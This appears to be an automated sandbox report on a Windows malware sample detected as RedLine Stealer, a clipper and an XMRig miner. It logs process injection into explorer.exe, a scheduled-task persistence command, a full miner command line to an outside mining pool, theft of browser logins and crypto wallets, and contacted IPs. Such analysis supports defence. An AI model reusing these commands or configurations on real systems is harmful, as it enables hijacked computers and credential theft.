Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80 Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process created: C:\Users\user\AppData\Local\Temp\sistem.exe "C:\Users\user\AppData\Local\Temp\sistem.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process created: C:\Users\user\AppData\Local\Temp\Microsoft.exe "C:\Users\user\AppData\Local\Temp\Microsoft.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sistem.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\Microsoft.exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe" Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd" cmd /c taskkill /f /PID "6040 Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "/sihost64 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /PID "6040" Jump to behavior
Uses taskkill to terminate processes
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /PID "6040" Jump to behavior
Source: AppLaunch.exe, 00000009.00000002.925344294.0000000005B70000.00000002.00020000.sdmp, conhost.exe, 0000000B.00000000.734467496.000001B0F4230000.00000002.00020000.sdmp, conhost.exe, 00000011.00000000.748949559.00000201F2970000.00000002.00020000.sdmp, conhost.exe, 00000015.00000000.752313076.00000224D63E0000.00000002.00020000.sdmp, conhost.exe, 00000017.00000000.757912065.0000025F9AE60000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: AppLaunch.exe, 00000009.00000002.925344294.0000000005B70000.00000002.00020000.sdmp, conhost.exe, 0000000B.00000000.734467496.000001B0F4230000.00000002.00020000.sdmp, conhost.exe, 00000011.00000000.748949559.00000201F2970000.00000002.00020000.sdmp, conhost.exe, 00000015.00000000.752313076.00000224D63E0000.00000002.00020000.sdmp, conhost.exe, 00000017.00000000.757912065.0000025F9AE60000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: AppLaunch.exe, 00000009.00000002.925344294.0000000005B70000.00000002.00020000.sdmp, conhost.exe, 0000000B.00000000.734467496.000001B0F4230000.00000002.00020000.sdmp, conhost.exe, 00000011.00000000.748949559.00000201F2970000.00000002.00020000.sdmp, conhost.exe, 00000015.00000000.752313076.00000224D63E0000.00000002.00020000.sdmp, conhost.exe, 00000017.00000000.757912065.0000025F9AE60000.00000002.00020000.sdmp Binary or memory string: Progman
Source: AppLaunch.exe, 00000009.00000002.925344294.0000000005B70000.00000002.00020000.sdmp, conhost.exe, 0000000B.00000000.734467496.000001B0F4230000.00000002.00020000.sdmp, conhost.exe, 00000011.00000000.748949559.00000201F2970000.00000002.00020000.sdmp, conhost.exe, 00000015.00000000.752313076.00000224D63E0000.00000002.00020000.sdmp, conhost.exe, 00000017.00000000.757912065.0000025F9AE60000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\conhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\conhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\conhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\explorer.exe Code function: 27_2_000000014031010C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 27_2_000000014031010C

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information:

barindex
Yara detected RedLine Stealer
Source: Yara match File source: 0.2.982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe.c3b50.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe.36f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.656396342.00000000000C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.731135586.0000000000402000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.655906687.00000000036F2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 5180, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Redline Clipper
Source: Yara match File source: 9.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.sistem.exe.be970.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.sistem.exe.2910000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.725269917.00000000000BD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.724529883.0000000002912000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.917454053.0000000000402000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: sistem.exe PID: 5576, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 7016, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 5180, type: MEMORYSTR

Remote Access Functionality:

barindex
Yara detected RedLine Stealer
Source: Yara match File source: 0.2.982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe.c3b50.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe.36f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.656396342.00000000000C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.731135586.0000000000402000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.655906687.00000000036F2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 5180, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 553228 Sample: 982d4ea5fee5b8e551d40cb0727... Startdate: 14/01/2022 Architecture: WINDOWS Score: 100 87 Sigma detected: Xmrig 2->87 89 Found malware configuration 2->89 91 Malicious sample detected (through community Yara rule) 2->91 93 12 other signatures 2->93 13 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe 2->13         started        16 services64.exe 2->16         started        process3 signatures4 143 Writes to foreign memory regions 13->143 145 Allocates memory in foreign processes 13->145 147 Injects a PE file into a foreign processes 13->147 18 AppLaunch.exe 15 8 13->18         started        149 Antivirus detection for dropped file 16->149 151 Multi AV Scanner detection for dropped file 16->151 153 Creates a thread in another existing process (thread injection) 16->153 23 conhost.exe 6 16->23         started        process5 dnsIp6 81 95.143.179.185, 31334, 49775 RHTEC-ASrh-tecIPBackboneDE Russian Federation 18->81 83 45.82.70.152, 49778, 49779, 7777 ON-LINE-DATAServerlocation-NetherlandsDrontenNL Netherlands 18->83 69 C:\Users\user\AppData\Local\Temp\sistem.exe, PE32 18->69 dropped 71 C:\Users\user\AppData\Local\...\Microsoft.exe, PE32+ 18->71 dropped 95 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 18->95 97 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 18->97 99 Tries to harvest and steal browser information (history, passwords, etc) 18->99 101 Tries to steal Crypto Currency Wallets 18->101 25 Microsoft.exe 18->25         started        28 sistem.exe 18->28         started        73 C:\Users\user\AppData\...\sihost64.exe, PE32+ 23->73 dropped 75 C:\Users\user\AppData\Roaming\...\WR64.sys, PE32+ 23->75 dropped 103 Injects code into the Windows Explorer (explorer.exe) 23->103 105 Writes to foreign memory regions 23->105 107 Modifies the context of a thread in another process (thread injection) 23->107 109 2 other signatures 23->109 30 sihost64.exe 23->30         started        32 explorer.exe 23->32         started        file7 signatures8 process9 dnsIp10 119 Antivirus detection for dropped file 25->119 121 Multi AV Scanner detection for dropped file 25->121 123 Writes to foreign memory regions 25->123 35 conhost.exe 4 25->35         started        125 Machine Learning detection for dropped file 28->125 127 Allocates memory in foreign processes 28->127 129 Injects a PE file into a foreign processes 28->129 38 AppLaunch.exe 2 28->38         started        131 Creates a thread in another existing process (thread injection) 30->131 40 conhost.exe 2 30->40         started        79 mine.bmpool.org 32->79 133 System process connects to network (likely due to code injection or exploit) 32->133 135 Query firmware table information (likely to detect VMs) 32->135 signatures11 process12 file13 77 C:\Users\user\AppData\...\services64.exe, PE32+ 35->77 dropped 42 cmd.exe 1 35->42         started        44 cmd.exe 1 35->44         started        process14 signatures15 47 services64.exe 42->47         started        50 conhost.exe 42->50         started        137 Uses schtasks.exe or at.exe to add and modify task schedules 44->137 52 conhost.exe 44->52         started        54 schtasks.exe 1 44->54         started        process16 signatures17 155 Writes to foreign memory regions 47->155 157 Allocates memory in foreign processes 47->157 159 Creates a thread in another existing process (thread injection) 47->159 56 conhost.exe 2 47->56         started        process18 signatures19 111 Injects code into the Windows Explorer (explorer.exe) 56->111 113 Writes to foreign memory regions 56->113 115 Modifies the context of a thread in another process (thread injection) 56->115 117 Injects a PE file into a foreign processes 56->117 59 explorer.exe 56->59         started        63 cmd.exe 1 56->63         started        process20 dnsIp21 85 mine.bmpool.org 157.90.156.89 REDIRISRedIRISAutonomousSystemES United States 59->85 139 System process connects to network (likely due to code injection or exploit) 59->139 141 Query firmware table information (likely to detect VMs) 59->141 65 taskkill.exe 1 63->65         started        67 conhost.exe 63->67         started        signatures22 process23
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
45.82.70.152
 unknown Netherlands
204601 ON-LINE-DATAServerlocation-NetherlandsDrontenNL false
157.90.156.89
 mine.bmpool.org United States
766 REDIRISRedIRISAutonomousSystemES false
95.143.179.185
 unknown Russian Federation
25560 RHTEC-ASrh-tecIPBackboneDE true

Contacted Domains

Name IP Active
mine.bmpool.org 157.90.156.89 true